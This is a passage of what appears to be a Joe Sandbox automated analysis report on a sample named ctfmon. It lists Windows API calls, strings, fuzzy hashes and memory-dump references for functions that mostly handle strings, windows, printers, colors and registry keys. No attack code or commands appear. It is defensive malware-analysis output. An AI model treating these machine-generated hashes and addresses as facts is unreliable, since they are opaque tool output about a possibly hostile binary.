        • Opcode Fuzzy Hash: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
        • Instruction Fuzzy Hash: 9BB1F7B0A0020AEFCB14DF64C8849AE7BB9FF48304B50446EF915EB290D775ED55CBA5
        APIs
        • LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 00414156
        • LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000), ref: 00414172
        • LCMapStringW.KERNEL32(00000000,?,004070FB,00000001,004070FB,004070FB,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 004141BB
        • WideCharToMultiByte.KERNEL32(00000000,00000220,004070FB,00000001,00000000,00000000,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?), ref: 004141EE
        • WideCharToMultiByte.KERNEL32(00000220,00000220,?,?,?,?,00000000,00000000), ref: 00414245
        • LCMapStringA.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00414261
        • LCMapStringA.KERNEL32(00000000,?,?,?,?,00000000), ref: 004142B7
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID:
        • API String ID: 352835431-0
        • Opcode ID: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
        • Instruction ID: 4b50a8c487744f979af65fd3580d31e16f27d9c7471aa09ca8c7b8346b332458
        • Opcode Fuzzy Hash: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
        • Instruction Fuzzy Hash: E8516072A01219FBCF218F95DC45AEF7F75FF49790F104126F914A2260D33988A1DBA9
        APIs
        • GlobalLock.KERNEL32(?), ref: 00420332
        • lstrcmpW.KERNEL32(00000000,?), ref: 0042033F
        • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00420351
        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00420374
        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042037C
        • GlobalLock.KERNEL32(00000000), ref: 00420389
        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00420396
        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004203B4
          • Part of subcall function 00426AAB: GlobalFlags.KERNEL32(?), ref: 00426AB5
          • Part of subcall function 00426AAB: GlobalUnlock.KERNEL32(?), ref: 00426ACC
          • Part of subcall function 00426AAB: GlobalFree.KERNEL32(?), ref: 00426AD7
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
        • String ID:
        • API String ID: 168474834-0
        • Opcode ID: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
        • Instruction ID: 0b204c46f73b846c4d535605207009b96763e7d5aecbe2a14173c396f1b1e3a3
        • Opcode Fuzzy Hash: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
        • Instruction Fuzzy Hash: B811B271600204BFDB219FA6DC85EAF7BBEEB85744F80441FF605C1122DA389D419768
        APIs
        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00403744
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403758
          • Part of subcall function 00405FAB: lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
          • Part of subcall function 00405FAB: FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
          • Part of subcall function 00405FAB: GetLastError.KERNEL32 ref: 00405FF1
          • Part of subcall function 00405FAB: SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C
        • SetCurrentDirectoryW.KERNEL32(?,*.*,00000000), ref: 00403772
        • SetCurrentDirectoryW.KERNEL32(?,?,*.*,00000000,?), ref: 004039B8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentDirectory$ErrorLast$FileFindFirstlstrcpy
        • String ID: *.*$+*&=^^^^--------FOAFI
        • API String ID: 3265023940-3701103783
        • Opcode ID: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
        • Instruction ID: c2ba0176b6e8a51bde1fead6c9d730875980fedec447b924fc6af5e119b7eb36
        • Opcode Fuzzy Hash: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
        • Instruction Fuzzy Hash: 5C91B2B16087458FC714EF64D881AAFB7E4FF94304F40492EF88697292DB789A09CB56
        APIs
        • __EH_prolog.LIBCMT ref: 0042A3D7
        • lstrlenA.KERNEL32(?,?,00000000), ref: 0042A402
          • Part of subcall function 0042A1BB: VariantChangeType.OLEAUT32(?,?,00000000), ref: 0042A25D
        • VariantClear.OLEAUT32(0000000C), ref: 0042A536
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Variant$ChangeClearH_prologTypelstrlen
        • String ID: `DvP?Dv
        • API String ID: 1986235341-2995021381
        • Opcode ID: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
        • Instruction ID: abb0e72d5d88a092ec7afbcfa9dfacffd580bca7bb0b75038710df2ecb83c9b3
        • Opcode Fuzzy Hash: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
        • Instruction Fuzzy Hash: 2571DF31A00219EBCB10DF95E884AAF7BB4FF04354B94801AFC45AB351D738DD65CB9A
        APIs
        • GetPropA.USER32(?,?), ref: 0041F5E3
        • CallWindowProcA.USER32(00000000), ref: 0041F605
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
        • Instruction ID: 95218b5de41767b7d9650821bd78bf42db176b432e658d53fc5444424646f800
        • Opcode Fuzzy Hash: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
        • Instruction Fuzzy Hash: 263121B66012106BD31097A8AC85DEFB79CDBD6365F04003AF904C3211E339A98B87BA
        APIs
        • SetBkColor.GDI32(?), ref: 0041C56D
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
        • SetBkColor.GDI32(?,?), ref: 0041C607
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
        • SetBkColor.GDI32(?,00000000), ref: 0041C674
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Text$Color
        • String ID:
        • API String ID: 3751486306-0
        • Opcode ID: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
        • Instruction ID: dabda8f32d19d4ae70fa47c5b4f3ddd5b41a6e56053b92537af6c747e390af38
        • Opcode Fuzzy Hash: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
        • Instruction Fuzzy Hash: EE415A74244301AFE320DF54CC86F6AB7E4EB85B40F64481DFA549A2C1D775E90ACB6A
        APIs
        • GetWindow.USER32(?,00000002), ref: 0040C2C0
        • GetParent.USER32(?), ref: 0040C2D3
          • Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000F0), ref: 0040C264
          • Part of subcall function 0040C24C: GetParent.USER32(?), ref: 0040C27D
          • Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000EC), ref: 0040C290
        • GetWindow.USER32(?,00000002), ref: 0040C2F6
        • GetWindow.USER32(?,00000002), ref: 0040C308
        • GetWindowLongW.USER32(?,000000EC), ref: 0040C318
        • IsWindowVisible.USER32(?), ref: 0040C331
        • GetTopWindow.USER32(?), ref: 0040C357
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Long$Parent$Visible
        • String ID:
        • API String ID: 3473418232-0
        • Opcode ID: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
        • Instruction ID: ba862818f269e3aceee2273a44a1f29cc0207a7b62508aff36e6de7303c25c2b
        • Opcode Fuzzy Hash: ad1c60d7dd1bbe177aea25ad133d5d740d3cacff3b0c382cf55e85d750fcfac4
        • Instruction Fuzzy Hash: FD219072740724ABD731AB669C89F2FB2ACAF40754F44873ABD41B72D1C638DC0587A8
        APIs
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BBA
        • GetFileTime.KERNEL32(00000000,z[B,?,?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BDB
        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00425B7A,?), ref: 00425BEA
        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00425B7A,?), ref: 00425C0B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$AttributesSizeTimelstrcpyn
        • String ID: z[B$z[B
        • API String ID: 1499663573-648401610
        • Opcode ID: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
        • Instruction ID: b0b1fca4624fb2a0d4a84746afc2279bc6a5ac128e51e5953a8924eafc8c791d
        • Opcode Fuzzy Hash: e76c36bad1554bebe900693a779f145176d16c0a690a29c8f3f1c0784b4361d4
        • Instruction Fuzzy Hash: 2B318072600615AFC720DFA1DCC5AABBBB8BB14310F504A2AF156D7280E774B989CB94
        APIs
        • GetCapture.USER32 ref: 00427264
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 00427281
        • GetFocus.USER32 ref: 00427293
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272A3
        • GetLastActivePopup.USER32(?), ref: 004272C6
        • SendMessageW.USER32(00000000,00000365,00000000,00000000), ref: 004272D6
        • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 004272F5
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessageSend$ActiveCaptureFocusLastPopup
        • String ID:
        • API String ID: 3219385341-0
        • Opcode ID: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
        • Instruction ID: 68473f9b5d7e177251982a610d2712512d6c7068ce16a05e5002633df34013cc
        • Opcode Fuzzy Hash: 2cfbcd3abc8782fe34278c35964e10fb786888f8cf757bf9c0f9356a80920232
        • Instruction Fuzzy Hash: 7011A076308229FBD6106A62FC84C3F7A6CDB827D9B9204AFF90193201DE299C06453E
        APIs
        • GetWindowRect.USER32(?), ref: 0041DF20
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DF29
        • InflateRect.USER32(?,00000001,00000001), ref: 0041DF88
        • GetParent.USER32(?), ref: 0041DF8F
        • ScreenToClient.USER32(00000000,?), ref: 0041DFA3
        • ScreenToClient.USER32(00000000,?), ref: 0041DFAB
        • InvalidateRect.USER32(00000000,?,00000000), ref: 0041DFC1
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
        • String ID:
        • API String ID: 1809568455-0
        • Opcode ID: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
        • Instruction ID: 5c4ce70eba9561d943b507e3d2f7660809a151edc0751f07b28f757fc8d36fc6
        • Opcode Fuzzy Hash: 58f5927d627f06ebdb3d6c3f4d4a38317ab9f67d64c63de6d6abd1e3eb937c86
        • Instruction Fuzzy Hash: BA218B72A00201AFD714DB14D8D4FBF73A9EF94760F40091EF95692291D738E986C76A
        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00428D8A
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DAD
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00428DCC
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DDC
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00428DE6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CloseCreate$Open
        • String ID: software
        • API String ID: 1740278721-2010147023
        • Opcode ID: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
        • Instruction ID: b72b22ee4a62b1fdbc469c719b3260cc0ea8d96049bfbdf274d8e70cb96c8cd0
        • Opcode Fuzzy Hash: 69adb2aea5cc14ec8ae342babbe5f54ff3db835e943cfe2388184d54ff1eedc4
        • Instruction Fuzzy Hash: 9A11E372E01128FBCB21CB9ADC84DEFFFBCEF95700F5000AAA504A2121D6709A05DBA4
        APIs
        • GetMapMode.GDI32(?,00000000,?,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 00427965
        • GetDeviceCaps.GDI32(?,00000058), ref: 0042799F
        • GetDeviceCaps.GDI32(?,0000005A), ref: 004279A8
          • Part of subcall function 0042657D: GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
          • Part of subcall function 0042657D: GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
          • Part of subcall function 0042657D: MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
          • Part of subcall function 0042657D: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB
        • MulDiv.KERNEL32(tw@,00000060,000009EC), ref: 004279CC
        • MulDiv.KERNEL32(00000002,?,000009EC), ref: 004279D7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CapsDevice$ModeViewportWindow
        • String ID: tw@
        • API String ID: 2598972148-3122378559
        • Opcode ID: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
        • Instruction ID: 92b9790e69b5446d6c958f7dd1d8ca38bdb3d9c6a46825f3b35b29f8475d5c98
        • Opcode Fuzzy Hash: 30f29e222e4cb38219f326d3fb46cec9727d7915d3471bf8a7ceecbc678bfd42
        • Instruction Fuzzy Hash: A3110E72700610EFEB21AF59DC44C2FBBA9EF89710B41402AE98587371C731AC82CF98
        APIs
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DFDD
        • GetWindowRect.USER32(?,?), ref: 0041DFEB
        • InflateRect.USER32(?,00000001,00000001), ref: 0041DFFA
        • GetParent.USER32(?), ref: 0041E001
        • ScreenToClient.USER32(00000000,?), ref: 0041E015
        • ScreenToClient.USER32(00000000,?), ref: 0041E01D
        • ValidateRect.USER32(00000000,?), ref: 0041E031
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
        • String ID:
        • API String ID: 2275295265-0
        • Opcode ID: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
        • Instruction ID: 6b051f3026c86bdc512559a30bcbe6d5191d46f4b5e6e7f40c6fc7ebd371f8c1
        • Opcode Fuzzy Hash: a915bac04b4fb549f67fcc827fd90f6c4676513c8cc0a7a62b76d954d98b73d1
        • Instruction Fuzzy Hash: 91F08136100202BFD321EB54DCC8DBF77BCEBC9B24F404929F91592151D774A80A8B66
        APIs
        • GetSysColor.USER32(0000000F), ref: 00424D60
        • GetSysColor.USER32(00000010), ref: 00424D67
        • GetSysColor.USER32(00000014), ref: 00424D6E
        • GetSysColor.USER32(00000012), ref: 00424D75
        • GetSysColor.USER32(00000006), ref: 00424D7C
        • GetSysColorBrush.USER32(0000000F), ref: 00424D89
        • GetSysColorBrush.USER32(00000006), ref: 00424D90
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$Brush
        • String ID:
        • API String ID: 2798902688-0
        • Opcode ID: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
        • Instruction ID: 18969bc28ed302142f8635eec16f63b65d63ba9001d0164203a570e39b19960d
        • Opcode Fuzzy Hash: 92d1a130750778a343b254b49833808b75e99ffc954d900b7f748f2d3a603d37
        • Instruction Fuzzy Hash: 1EF0F871A407489BD730AB729D49B4BBAE0FFC4B10F02092AD2858BA90E6B5F4419F44
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Version$ClipboardFormatRegister
        • String ID: MSWHEEL_ROLLMSG
        • API String ID: 2888461884-2485103130
        • Opcode ID: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
        • Instruction ID: f412c579cb3b66504e538c215866e8624d94ca82ea27c6ff18154eccb9f95b5c
